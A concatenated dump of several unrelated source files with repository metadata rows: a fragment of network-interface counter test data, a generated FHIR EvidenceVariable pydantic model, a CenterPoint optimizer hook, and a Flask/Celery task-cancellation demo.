"in_no_buffer": 0,
"in_octets": 107581463084138,
"in_overrun": 0,
"in_pkts": 112310736139,
"in_runts": 0,
"in_throttles": 0,
"in_watchdog": 0,
"last_clear": "never",
"out_babble": 0,
"out_buffer_failure": 0,
"out_buffers_swapped": 0,
"out_collision": 0,
"out_deferred": 0,
"out_errors": 0,
"out_interface_resets": 2,
"out_late_collision": 0,
"out_lost_carrier": 0,
"out_mac_pause_frames": 0,
"out_no_carrier": 0,
"out_octets": 174533887805,
"out_pkts": 1539949004,
"out_underruns": 0,
"out_unknown_protocl_drops": 81113,
"rate": {
"in_rate": 24128000,
"in_rate_pkts": 2898,
"load_interval": 300,
"out_rate": 104000,
"out_rate_pkts": 122,
},
},
"delay": 10,
"description": "Internet OUT Link (Through ASA or Direct)",
"duplex_mode": "full",
"enabled": True,
"is_deleted": False,
"encapsulations": {"encapsulation": "dot1q", "first_dot1q": "1"},
"flow_control": {"receive": True, "send": True},
"last_input": "00:00:00",
"last_output": "00:00:00",
"line_protocol": "up",
"link_type": "force-up",
"mac_address": "2c33.11ff.fa1a",
"media_type": "SFP-LR",
"mtu": 1500,
"oper_status": "up",
"output_hang": "never",
"phys_address": "2c33.11ff.fa1a",
"port_channel": {"port_channel_member": False},
"port_speed": "10000mbps",
"queues": {
"input_queue_drops": 1873,
"input_queue_flushes": 1370,
"input_queue_max": 375,
"input_queue_size": 0,
"output_queue_max": 40,
"output_queue_size": 0,
"queue_strategy": "Class-based",
"total_output_drop": 0,
},
"reliability": "255/255",
"rxload": "1/255",
"txload": "1/255",
"type": "BUILT-IN-EPA-8x10G",
},
"TenGigabitEthernet0/1/5": {
"arp_timeout": "04:00:00",
"arp_type": "arpa",
"auto_negotiate": False,
"bandwidth": 10000000,
"counters": {
"in_broadcast_pkts": 0,
"in_crc_errors": 0,
"in_errors": 0,
"in_frame": 0,
"in_giants": 0,
"in_ignored": 0,
"in_mac_pause_frames": 0,
"in_multicast_pkts": 0,
"in_no_buffer": 0,
"in_octets": 0,
"in_overrun": 0,
"in_pkts": 0,
"in_runts": 0,
"in_throttles": 0,
"in_watchdog": 0,
"last_clear": "never",
"out_babble": 0,
"out_buffer_failure": 0,
"out_buffers_swapped": 0,
"out_collision": 0,
"out_deferred": 0,
"out_errors": 0,
"out_interface_resets": 1,
"out_late_collision": 0,
"out_lost_carrier": 0,
"out_mac_pause_frames": 0,
"out_no_carrier": 0,
"out_octets": 0,
"out_pkts": 0,
"out_underruns": 0,
"out_unknown_protocl_drops": 0,
"rate": {
"in_rate": 0,
"in_rate_pkts": 0,
"load_interval": 300,
"out_rate": 0,
"out_rate_pkts": 0,
},
},
"delay": 10,
"duplex_mode": "full",
"enabled": False,
"is_deleted": False,
"encapsulations": {"encapsulation": "arpa"},
"flow_control": {"receive": False, "send": False},
"last_input": "never",
"last_output": "never",
"line_protocol": "down",
"link_type": "force-up",
"mac_address": "2c33.11ff.fa1e",
"media_type": "unknown",
"mtu": 1500,
"oper_status": "down",
"output_hang": "never",
"phys_address": "2c33.11ff.fa1e",
"port_channel": {"port_channel_member": False},
"port_speed": "10000mbps",
"queues": {
"input_queue_drops": 0,
"input_queue_flushes": 0,
"input_queue_max": 375,
"input_queue_size": 0,
"output_queue_max": 40,
"output_queue_size": 0,
"queue_strategy": "fifo",
"total_output_drop": 0,
},
"reliability": "255/255",
"rxload": "1/255",
"txload": "1/255",
"type": "BUILT-IN-EPA-8x10G",
},
"TenGigabitEthernet0/1/6": {
"arp_timeout": "04:00:00",
"arp_type": "arpa",
"auto_negotiate": False,
"bandwidth": 10000000,
"counters": {
"in_broadcast_pkts": 0,
"in_crc_errors": 0,
"in_errors": 0,
"in_frame": 0,
"in_giants": 0,
"in_ignored": 0,
"in_mac_pause_frames": 0,
"in_multicast_pkts": 0,
"in_no_buffer": 0,
"in_octets": 0,
"in_overrun": 0,
"in_pkts": 0,
"in_runts": 0,
"in_throttles": 0,
"in_watchdog": 0,
"last_clear": "never",
"out_babble": 0,
"out_buffer_failure": 0,
"out_buffers_swapped": 0,
"out_collision": 0,
"out_deferred": 0,
"out_errors": 0,
"out_interface_resets": 1,
"out_late_collision": 0,
"out_lost_carrier": 0,
"out_mac_pause_frames": 0,
"out_no_carrier": 0,
"out_octets": 0,
"out_pkts": 0,
"out_underruns": 0,
"out_unknown_protocl_drops": 0,
"rate": {
"in_rate": 0,
"in_rate_pkts": 0,
"load_interval": 300,
"out_rate": 0,
"out_rate_pkts": 0,
},
},
"delay": 10,
"duplex_mode": "full",
"enabled": False,
"is_deleted": False,
"encapsulations": {"encapsulation": "arpa"},
"flow_control": {"receive": False, "send": False},
"last_input": "never",
"last_output": "never",
"line_protocol": "down",
"link_type": "force-up",
"mac_address": "2c33.11ff.fa1f",
"media_type": "unknown",
"mtu": 1500,
"oper_status": "down",
"output_hang": "never",
"phys_address": "2c33.11ff.fa1f",
"port_channel": {"port_channel_member": False},
"port_speed": "10000mbps",
"queues": {
"input_queue_drops": 0,
"input_queue_flushes": 0,
"input_queue_max": 375,
"input_queue_size": 0,
"output_queue_max": 40,
"output_queue_size": 0,
"queue_strategy": "fifo",
"total_output_drop": 0,
},
"reliability": "255/255",
"rxload": "1/255",
"txload": "1/255",
"type": "BUILT-IN-EPA-8x10G",
},
}
|
c66ebc70c8f53427c2f9cd46185ed9496bc65936
|
fdb9bdc6c4ab2f14ba71e544493706d5e275899f
|
/fhir/resources/R4B/evidencevariable.py
|
248c00c2229c3e04c42ccc77d988e217a00ed883
|
[
"BSD-3-Clause"
] |
permissive
|
nazrulworld/fhir.resources
|
6ae8aea8180c611b0c5050759c6dcdf63e4cb061
|
1fd6ea476b27b3fcb8c4ef8f23bc51cf161e69e3
|
refs/heads/main
| 2023-08-30T18:27:27.277249
| 2023-07-03T19:57:06
| 2023-07-03T19:57:06
| 165,297,877
| 256
| 83
|
NOASSERTION
| 2023-08-24T15:34:05
| 2019-01-11T19:26:41
|
Python
|
UTF-8
|
Python
| false
| false
| 34,996
|
py
|
evidencevariable.py
|
# -*- coding: utf-8 -*-
"""
Profile: http://hl7.org/fhir/StructureDefinition/EvidenceVariable
Release: R4B
Version: 4.3.0
Build ID: c475c22
Last updated: 2022-05-28T12:47:40.239+10:00
"""
import typing
from pydantic import Field, root_validator
from pydantic.error_wrappers import ErrorWrapper, ValidationError
from pydantic.errors import MissingError, NoneIsNotAllowedError
from . import backboneelement, domainresource, fhirtypes
class EvidenceVariable(domainresource.DomainResource):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
A definition of an exposure, outcome, or other variable.
The EvidenceVariable resource describes an element that knowledge
(Evidence) is about.
"""
resource_type = Field("EvidenceVariable", const=True)
actual: bool = Field(
None,
alias="actual",
title="Actual or conceptual",
description=(
"True if the actual variable measured, false if a conceptual "
"representation of the intended variable."
),
# if property is element of this resource.
element_property=True,
)
actual__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_actual", title="Extension field for ``actual``."
)
author: typing.List[fhirtypes.ContactDetailType] = Field(
None,
alias="author",
title="Who authored the content",
description=(
"An individiual or organization primarily involved in the creation and "
"maintenance of the content."
),
# if property is element of this resource.
element_property=True,
)
category: typing.List[fhirtypes.EvidenceVariableCategoryType] = Field(
None,
alias="category",
title="A grouping for ordinal or polychotomous variables",
description=(
"A grouping (or set of values) described along with other groupings to "
"specify the set of groupings allowed for the variable."
),
# if property is element of this resource.
element_property=True,
)
characteristic: typing.List[fhirtypes.EvidenceVariableCharacteristicType] = Field(
None,
alias="characteristic",
title="What defines the members of the evidence element",
description=(
"A characteristic that defines the members of the evidence element. "
'Multiple characteristics are applied with "and" semantics.'
),
# if property is element of this resource.
element_property=True,
)
characteristicCombination: fhirtypes.Code = Field(
None,
alias="characteristicCombination",
title="intersection | union",
description=(
"Used to specify if two or more characteristics are combined with OR or"
" AND."
),
# if property is element of this resource.
element_property=True,
# note: Enum values can be used in validation,
# but use in your own responsibilities, read official FHIR documentation.
enum_values=["intersection", "union"],
)
characteristicCombination__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None,
alias="_characteristicCombination",
title="Extension field for ``characteristicCombination``.",
)
contact: typing.List[fhirtypes.ContactDetailType] = Field(
None,
alias="contact",
title="Contact details for the publisher",
description=(
"Contact details to assist a user in finding and communicating with the"
" publisher."
),
# if property is element of this resource.
element_property=True,
)
date: fhirtypes.DateTime = Field(
None,
alias="date",
title="Date last changed",
description=(
"The date (and optionally time) when the evidence variable was "
"published. The date must change when the business version changes and "
"it must change if the status code changes. In addition, it should "
"change when the substantive content of the evidence variable changes."
),
# if property is element of this resource.
element_property=True,
)
date__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_date", title="Extension field for ``date``."
)
description: fhirtypes.Markdown = Field(
None,
alias="description",
title="Natural language description of the evidence variable",
description=(
"A free text natural language description of the evidence variable from"
" a consumer's perspective."
),
# if property is element of this resource.
element_property=True,
)
description__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_description", title="Extension field for ``description``."
)
editor: typing.List[fhirtypes.ContactDetailType] = Field(
None,
alias="editor",
title="Who edited the content",
description=(
"An individual or organization primarily responsible for internal "
"coherence of the content."
),
# if property is element of this resource.
element_property=True,
)
endorser: typing.List[fhirtypes.ContactDetailType] = Field(
None,
alias="endorser",
title="Who endorsed the content",
description=(
"An individual or organization responsible for officially endorsing the"
" content for use in some setting."
),
# if property is element of this resource.
element_property=True,
)
handling: fhirtypes.Code = Field(
None,
alias="handling",
title="continuous | dichotomous | ordinal | polychotomous",
description="Used for an outcome to classify.",
# if property is element of this resource.
element_property=True,
# note: Enum values can be used in validation,
# but use in your own responsibilities, read official FHIR documentation.
enum_values=["continuous", "dichotomous", "ordinal", "polychotomous"],
)
handling__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_handling", title="Extension field for ``handling``."
)
identifier: typing.List[fhirtypes.IdentifierType] = Field(
None,
alias="identifier",
title="Additional identifier for the evidence variable",
description=(
"A formal identifier that is used to identify this evidence variable "
"when it is represented in other formats, or referenced in a "
"specification, model, design or an instance."
),
# if property is element of this resource.
element_property=True,
)
name: fhirtypes.String = Field(
None,
alias="name",
title="Name for this evidence variable (computer friendly)",
description=(
"A natural language name identifying the evidence variable. This name "
"should be usable as an identifier for the module by machine processing"
" applications such as code generation."
),
# if property is element of this resource.
element_property=True,
)
name__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_name", title="Extension field for ``name``."
)
note: typing.List[fhirtypes.AnnotationType] = Field(
None,
alias="note",
title="Used for footnotes or explanatory notes",
description=(
"A human-readable string to clarify or explain concepts about the "
"resource."
),
# if property is element of this resource.
element_property=True,
)
publisher: fhirtypes.String = Field(
None,
alias="publisher",
title="Name of the publisher (organization or individual)",
description=(
"The name of the organization or individual that published the evidence"
" variable."
),
# if property is element of this resource.
element_property=True,
)
publisher__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_publisher", title="Extension field for ``publisher``."
)
relatedArtifact: typing.List[fhirtypes.RelatedArtifactType] = Field(
None,
alias="relatedArtifact",
title="Additional documentation, citations, etc.",
description=(
"Related artifacts such as additional documentation, justification, or "
"bibliographic references."
),
# if property is element of this resource.
element_property=True,
)
reviewer: typing.List[fhirtypes.ContactDetailType] = Field(
None,
alias="reviewer",
title="Who reviewed the content",
description=(
"An individual or organization primarily responsible for review of some"
" aspect of the content."
),
# if property is element of this resource.
element_property=True,
)
shortTitle: fhirtypes.String = Field(
None,
alias="shortTitle",
title="Title for use in informal contexts",
description=(
"The short title provides an alternate title for use in informal "
"descriptive contexts where the full, formal title is not necessary."
),
# if property is element of this resource.
element_property=True,
)
shortTitle__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_shortTitle", title="Extension field for ``shortTitle``."
)
status: fhirtypes.Code = Field(
None,
alias="status",
title="draft | active | retired | unknown",
description=(
"The status of this evidence variable. Enables tracking the life-cycle "
"of the content."
),
# if property is element of this resource.
element_property=True,
element_required=True,
# note: Enum values can be used in validation,
# but use in your own responsibilities, read official FHIR documentation.
enum_values=["draft", "active", "retired", "unknown"],
)
status__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_status", title="Extension field for ``status``."
)
subtitle: fhirtypes.String = Field(
None,
alias="subtitle",
title="Subordinate title of the EvidenceVariable",
description=(
"An explanatory or alternate title for the EvidenceVariable giving "
"additional information about its content."
),
# if property is element of this resource.
element_property=True,
)
subtitle__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_subtitle", title="Extension field for ``subtitle``."
)
title: fhirtypes.String = Field(
None,
alias="title",
title="Name for this evidence variable (human friendly)",
description="A short, descriptive, user-friendly title for the evidence variable.",
# if property is element of this resource.
element_property=True,
)
title__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_title", title="Extension field for ``title``."
)
url: fhirtypes.Uri = Field(
None,
alias="url",
title=(
"Canonical identifier for this evidence variable, represented as a URI "
"(globally unique)"
),
description=(
"An absolute URI that is used to identify this evidence variable when "
"it is referenced in a specification, model, design or an instance; "
"also called its canonical identifier. This SHOULD be globally unique "
"and SHOULD be a literal address at which at which an authoritative "
"instance of this evidence variable is (or will be) published. This URL"
" can be the target of a canonical reference. It SHALL remain the same "
"when the evidence variable is stored on different servers."
),
# if property is element of this resource.
element_property=True,
)
url__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_url", title="Extension field for ``url``."
)
useContext: typing.List[fhirtypes.UsageContextType] = Field(
None,
alias="useContext",
title="The context that the content is intended to support",
description=(
"The content was developed with a focus and intent of supporting the "
"contexts that are listed. These contexts may be general categories "
"(gender, age, ...) or may be references to specific programs "
"(insurance plans, studies, ...) and may be used to assist with "
"indexing and searching for appropriate evidence variable instances."
),
# if property is element of this resource.
element_property=True,
)
version: fhirtypes.String = Field(
None,
alias="version",
title="Business version of the evidence variable",
description=(
"The identifier that is used to identify this version of the evidence "
"variable when it is referenced in a specification, model, design or "
"instance. This is an arbitrary value managed by the evidence variable "
"author and is not expected to be globally unique. For example, it "
"might be a timestamp (e.g. yyyymmdd) if a managed version is not "
"available. There is also no expectation that versions can be placed in"
" a lexicographical sequence. To provide a version consistent with the "
"Decision Support Service specification, use the format "
"Major.Minor.Revision (e.g. 1.0.0). For more information on versioning "
"knowledge assets, refer to the Decision Support Service specification."
" Note that a version is required for non-experimental active "
"artifacts."
),
# if property is element of this resource.
element_property=True,
)
version__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_version", title="Extension field for ``version``."
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``EvidenceVariable`` according specification,
with preserving original sequence order.
"""
return [
"id",
"meta",
"implicitRules",
"language",
"text",
"contained",
"extension",
"modifierExtension",
"url",
"identifier",
"version",
"name",
"title",
"shortTitle",
"subtitle",
"status",
"date",
"description",
"note",
"useContext",
"publisher",
"contact",
"author",
"editor",
"reviewer",
"endorser",
"relatedArtifact",
"actual",
"characteristicCombination",
"characteristic",
"handling",
"category",
]
@root_validator(pre=True, allow_reuse=True)
def validate_required_primitive_elements_1779(
cls, values: typing.Dict[str, typing.Any]
) -> typing.Dict[str, typing.Any]:
"""https://www.hl7.org/fhir/extensibility.html#Special-Case
In some cases, implementers might find that they do not have appropriate data for
an element with minimum cardinality = 1. In this case, the element must be present,
but unless the resource or a profile on it has made the actual value of the primitive
data type mandatory, it is possible to provide an extension that explains why
the primitive value is not present.
"""
required_fields = [("status", "status__ext")]
_missing = object()
def _fallback():
return ""
errors: typing.List["ErrorWrapper"] = []
for name, ext in required_fields:
field = cls.__fields__[name]
ext_field = cls.__fields__[ext]
value = values.get(field.alias, _missing)
if value not in (_missing, None):
continue
ext_value = values.get(ext_field.alias, _missing)
missing_ext = True
if ext_value not in (_missing, None):
if isinstance(ext_value, dict):
missing_ext = len(ext_value.get("extension", [])) == 0
elif (
getattr(ext_value.__class__, "get_resource_type", _fallback)()
== "FHIRPrimitiveExtension"
):
if ext_value.extension and len(ext_value.extension) > 0:
missing_ext = False
else:
validate_pass = True
for validator in ext_field.type_.__get_validators__():
try:
ext_value = validator(v=ext_value)
except ValidationError as exc:
errors.append(ErrorWrapper(exc, loc=ext_field.alias))
validate_pass = False
if not validate_pass:
continue
if ext_value.extension and len(ext_value.extension) > 0:
missing_ext = False
if missing_ext:
if value is _missing:
errors.append(ErrorWrapper(MissingError(), loc=field.alias))
else:
errors.append(
ErrorWrapper(NoneIsNotAllowedError(), loc=field.alias)
)
if len(errors) > 0:
raise ValidationError(errors, cls) # type: ignore
return values
class EvidenceVariableCategory(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
A grouping for ordinal or polychotomous variables.
A grouping (or set of values) described along with other groupings to
specify the set of groupings allowed for the variable.
"""
resource_type = Field("EvidenceVariableCategory", const=True)
name: fhirtypes.String = Field(
None,
alias="name",
title="Description of the grouping",
description="A human-readable title or representation of the grouping.",
# if property is element of this resource.
element_property=True,
)
name__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_name", title="Extension field for ``name``."
)
valueCodeableConcept: fhirtypes.CodeableConceptType = Field(
None,
alias="valueCodeableConcept",
title="Definition of the grouping",
description="Value or set of values that define the grouping.",
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e value[x]
one_of_many="value",
one_of_many_required=False,
)
valueQuantity: fhirtypes.QuantityType = Field(
None,
alias="valueQuantity",
title="Definition of the grouping",
description="Value or set of values that define the grouping.",
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e value[x]
one_of_many="value",
one_of_many_required=False,
)
valueRange: fhirtypes.RangeType = Field(
None,
alias="valueRange",
title="Definition of the grouping",
description="Value or set of values that define the grouping.",
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e value[x]
one_of_many="value",
one_of_many_required=False,
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``EvidenceVariableCategory`` according specification,
with preserving original sequence order.
"""
return [
"id",
"extension",
"modifierExtension",
"name",
"valueCodeableConcept",
"valueQuantity",
"valueRange",
]
@root_validator(pre=True, allow_reuse=True)
def validate_one_of_many_2629(
cls, values: typing.Dict[str, typing.Any]
) -> typing.Dict[str, typing.Any]:
"""https://www.hl7.org/fhir/formats.html#choice
A few elements have a choice of more than one data type for their content.
All such elements have a name that takes the form nnn[x].
The "nnn" part of the name is constant, and the "[x]" is replaced with
the title-cased name of the type that is actually used.
The table view shows each of these names explicitly.
Elements that have a choice of data type cannot repeat - they must have a
maximum cardinality of 1. When constructing an instance of an element with a
choice of types, the authoring system must create a single element with a
data type chosen from among the list of permitted data types.
"""
one_of_many_fields = {
"value": ["valueCodeableConcept", "valueQuantity", "valueRange"]
}
for prefix, fields in one_of_many_fields.items():
assert cls.__fields__[fields[0]].field_info.extra["one_of_many"] == prefix
required = (
cls.__fields__[fields[0]].field_info.extra["one_of_many_required"]
is True
)
found = False
for field in fields:
if field in values and values[field] is not None:
if found is True:
raise ValueError(
"Any of one field value is expected from "
f"this list {fields}, but got multiple!"
)
else:
found = True
if required is True and found is False:
raise ValueError(f"Expect any of field value from this list {fields}.")
return values
class EvidenceVariableCharacteristic(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
What defines the members of the evidence element.
A characteristic that defines the members of the evidence element. Multiple
characteristics are applied with "and" semantics.
"""
resource_type = Field("EvidenceVariableCharacteristic", const=True)
definitionCanonical: fhirtypes.Canonical = Field(
None,
alias="definitionCanonical",
title="What code or expression defines members?",
description=(
"Define members of the evidence element using Codes (such as condition,"
" medication, or observation), Expressions ( using an expression "
"language such as FHIRPath or CQL) or DataRequirements (such as "
"Diabetes diagnosis onset in the last year)."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e definition[x]
one_of_many="definition",
one_of_many_required=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["Resource"],
)
definitionCanonical__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None,
alias="_definitionCanonical",
title="Extension field for ``definitionCanonical``.",
)
definitionCodeableConcept: fhirtypes.CodeableConceptType = Field(
None,
alias="definitionCodeableConcept",
title="What code or expression defines members?",
description=(
"Define members of the evidence element using Codes (such as condition,"
" medication, or observation), Expressions ( using an expression "
"language such as FHIRPath or CQL) or DataRequirements (such as "
"Diabetes diagnosis onset in the last year)."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e definition[x]
one_of_many="definition",
one_of_many_required=True,
)
definitionExpression: fhirtypes.ExpressionType = Field(
None,
alias="definitionExpression",
title="What code or expression defines members?",
description=(
"Define members of the evidence element using Codes (such as condition,"
" medication, or observation), Expressions ( using an expression "
"language such as FHIRPath or CQL) or DataRequirements (such as "
"Diabetes diagnosis onset in the last year)."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e definition[x]
one_of_many="definition",
one_of_many_required=True,
)
definitionReference: fhirtypes.ReferenceType = Field(
None,
alias="definitionReference",
title="What code or expression defines members?",
description=(
"Define members of the evidence element using Codes (such as condition,"
" medication, or observation), Expressions ( using an expression "
"language such as FHIRPath or CQL) or DataRequirements (such as "
"Diabetes diagnosis onset in the last year)."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e definition[x]
one_of_many="definition",
one_of_many_required=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["Group", "EvidenceVariable"],
)
description: fhirtypes.String = Field(
None,
alias="description",
title="Natural language description of the characteristic",
description=(
"A short, natural language description of the characteristic that could"
" be used to communicate the criteria to an end-user."
),
# if property is element of this resource.
element_property=True,
)
description__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_description", title="Extension field for ``description``."
)
device: fhirtypes.ReferenceType = Field(
None,
alias="device",
title="Device used for determining characteristic",
description=None,
# if property is element of this resource.
element_property=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["Device", "DeviceMetric"],
)
exclude: bool = Field(
None,
alias="exclude",
title="Whether the characteristic includes or excludes members",
description=(
"When true, members with this characteristic are excluded from the "
"element."
),
# if property is element of this resource.
element_property=True,
)
exclude__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_exclude", title="Extension field for ``exclude``."
)
groupMeasure: fhirtypes.Code = Field(
None,
alias="groupMeasure",
title=(
"mean | median | mean-of-mean | mean-of-median | median-of-mean | "
"median-of-median"
),
description=(
"Indicates how elements are aggregated within the study effective "
"period."
),
# if property is element of this resource.
element_property=True,
# note: Enum values can be used in validation,
# but use in your own responsibilities, read official FHIR documentation.
enum_values=[
"mean",
"median",
"mean-of-mean",
"mean-of-median",
"median-of-mean",
"median-of-median",
],
)
groupMeasure__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_groupMeasure", title="Extension field for ``groupMeasure``."
)
method: fhirtypes.CodeableConceptType = Field(
None,
alias="method",
title="Method used for describing characteristic",
description=None,
# if property is element of this resource.
element_property=True,
)
timeFromStart: fhirtypes.EvidenceVariableCharacteristicTimeFromStartType = Field(
None,
alias="timeFromStart",
title="Observation time from study start",
description=(
"Indicates duration, period, or point of observation from the "
"participant's study entry."
),
# if property is element of this resource.
element_property=True,
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``EvidenceVariableCharacteristic`` according specification,
with preserving original sequence order.
"""
return [
"id",
"extension",
"modifierExtension",
"description",
"definitionReference",
"definitionCanonical",
"definitionCodeableConcept",
"definitionExpression",
"method",
"device",
"exclude",
"timeFromStart",
"groupMeasure",
]
@root_validator(pre=True, allow_reuse=True)
def validate_one_of_many_3226(
cls, values: typing.Dict[str, typing.Any]
) -> typing.Dict[str, typing.Any]:
"""https://www.hl7.org/fhir/formats.html#choice
A few elements have a choice of more than one data type for their content.
All such elements have a name that takes the form nnn[x].
The "nnn" part of the name is constant, and the "[x]" is replaced with
the title-cased name of the type that is actually used.
The table view shows each of these names explicitly.
Elements that have a choice of data type cannot repeat - they must have a
maximum cardinality of 1. When constructing an instance of an element with a
choice of types, the authoring system must create a single element with a
data type chosen from among the list of permitted data types.
"""
one_of_many_fields = {
"definition": [
"definitionCanonical",
"definitionCodeableConcept",
"definitionExpression",
"definitionReference",
]
}
for prefix, fields in one_of_many_fields.items():
assert cls.__fields__[fields[0]].field_info.extra["one_of_many"] == prefix
required = (
cls.__fields__[fields[0]].field_info.extra["one_of_many_required"]
is True
)
found = False
for field in fields:
if field in values and values[field] is not None:
if found is True:
raise ValueError(
"Any of one field value is expected from "
f"this list {fields}, but got multiple!"
)
else:
found = True
if required is True and found is False:
raise ValueError(f"Expect any of field value from this list {fields}.")
return values
class EvidenceVariableCharacteristicTimeFromStart(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
Observation time from study start.
Indicates duration, period, or point of observation from the participant's
study entry.
"""
resource_type = Field("EvidenceVariableCharacteristicTimeFromStart", const=True)
description: fhirtypes.String = Field(
None,
alias="description",
title="Human readable description",
description="A short, natural language description.",
# if property is element of this resource.
element_property=True,
)
description__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_description", title="Extension field for ``description``."
)
note: typing.List[fhirtypes.AnnotationType] = Field(
None,
alias="note",
title="Used for footnotes or explanatory notes",
description=(
"A human-readable string to clarify or explain concepts about the "
"resource."
),
# if property is element of this resource.
element_property=True,
)
quantity: fhirtypes.QuantityType = Field(
None,
alias="quantity",
title=(
"Used to express the observation at a defined amount of time after the "
"study start"
),
description=None,
# if property is element of this resource.
element_property=True,
)
range: fhirtypes.RangeType = Field(
None,
alias="range",
title="Used to express the observation within a period after the study start",
description=None,
# if property is element of this resource.
element_property=True,
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``EvidenceVariableCharacteristicTimeFromStart`` according specification,
with preserving original sequence order.
"""
return [
"id",
"extension",
"modifierExtension",
"description",
"quantity",
"range",
"note",
]
|
ac71cd2ee4553db02ba1c6dfac5a5f46eafab65c
|
689a78e08c957abc02ea5f89fb657b1f78f88b6e
|
/det3d/torchie/trainer/hooks/optimizer.py
|
9a50e620af4705cb66732dd2551adc4618a13323
|
[
"MIT",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
tianweiy/CenterPoint
|
2bb9a7def8d4bf87b66af2e3b671736eae6fa275
|
d3a248fa56db2601860d576d5934d00fee9916eb
|
refs/heads/master
| 2023-08-30T23:11:49.528882
| 2022-10-24T13:09:52
| 2022-10-24T13:09:52
| 274,006,091
| 1,692
| 476
|
MIT
| 2023-05-06T10:30:06
| 2020-06-22T00:32:05
|
Python
|
UTF-8
|
Python
| false
| false
| 609
|
py
|
optimizer.py
|
from torch.nn.utils import clip_grad
from .hook import Hook
class OptimizerHook(Hook):
def __init__(self, grad_clip=None):
self.grad_clip = grad_clip
def clip_grads(self, params):
clip_grad.clip_grad_norm_(
filter(lambda p: p.requires_grad, params), **self.grad_clip
)
def after_train_iter(self, trainer):
trainer.optimizer.zero_grad()
# print(trainer.outputs["loss"])
trainer.outputs["loss"].backward()
if self.grad_clip is not None:
self.clip_grads(trainer.model.parameters())
trainer.optimizer.step()
|
edda75b4b97058a66dbf7f5338ff4cbf8dc09dd6
|
6dfc23ef65e5943712340ef2b4b648cc25ea1fad
|
/2022/08/10/How to Cancel a Running Task in Celery/celery_example/app/myapp/__init__.py
|
26b10e9d95f01165ed3a242c54c98733fca0b0b2
|
[
"Unlicense"
] |
permissive
|
PrettyPrinted/youtube_video_code
|
6d265c910de18d780cdb99f7ea11b8b963929dc2
|
5654e5feba854d3b41b8dd75218e0221408e7831
|
refs/heads/master
| 2023-09-04T21:28:57.386174
| 2023-08-11T07:07:45
| 2023-08-11T07:07:45
| 186,743,986
| 698
| 2,347
|
Unlicense
| 2022-10-06T04:06:56
| 2019-05-15T03:40:45
|
HTML
|
UTF-8
|
Python
| false
| false
| 1,206
|
py
|
__init__.py
|
from celery import Celery
from celery.contrib.abortable import AbortableTask
from flask import Flask, render_template
from time import sleep
def make_celery(app):
celery = Celery(app.name)
celery.conf.update(app.config["CELERY_CONFIG"])
class ContextTask(celery.Task):
def __call__(self, *args, **kwargs):
with app.app_context():
return self.run(*args, **kwargs)
celery.Task = ContextTask
return celery
def create_app():
app = Flask(__name__)
app.config.update(CELERY_CONFIG={
'broker_url': 'redis://redis',
'result_backend': 'redis://redis'
})
celery = make_celery(app)
@celery.task(bind=True, base=AbortableTask)
def count(self):
for i in range(10):
if self.is_aborted():
return 'Task stopped!'
print(i)
sleep(1)
return 'DONE!'
@app.route('/start')
def start():
task = count.delay()
return render_template('start.html', task=task)
@app.route('/cancel/<task_id>')
def cancel(task_id):
task = count.AsyncResult(task_id)
task.abort()
return 'Canceled!'
return app, celery
|
ef87a393ab1bc476ed1e04cd620d97b21363e401
|
bee4b8a10d36f6b9a2b9ec860129b4754449330c
|
/tutorials/adaptive_attacks/patch_loss_gradient.py
|
418ff2b124b78af070bcfb79e72efe75899d6d90
|
[
"MIT"
] |
permissive
|
twosixlabs/armory
|
abe314ceacfd081b0bf269074d44cdc59748cd8e
|
3efd21652cfdc8cd192681e9daf58a4b08e82db4
|
refs/heads/master
| 2023-07-19T17:31:30.729681
| 2023-07-03T15:30:23
| 2023-07-03T15:30:23
| 222,796,322
| 153
| 79
|
MIT
| 2023-09-05T17:17:03
| 2019-11-19T21:48:44
|
Python
|
UTF-8
|
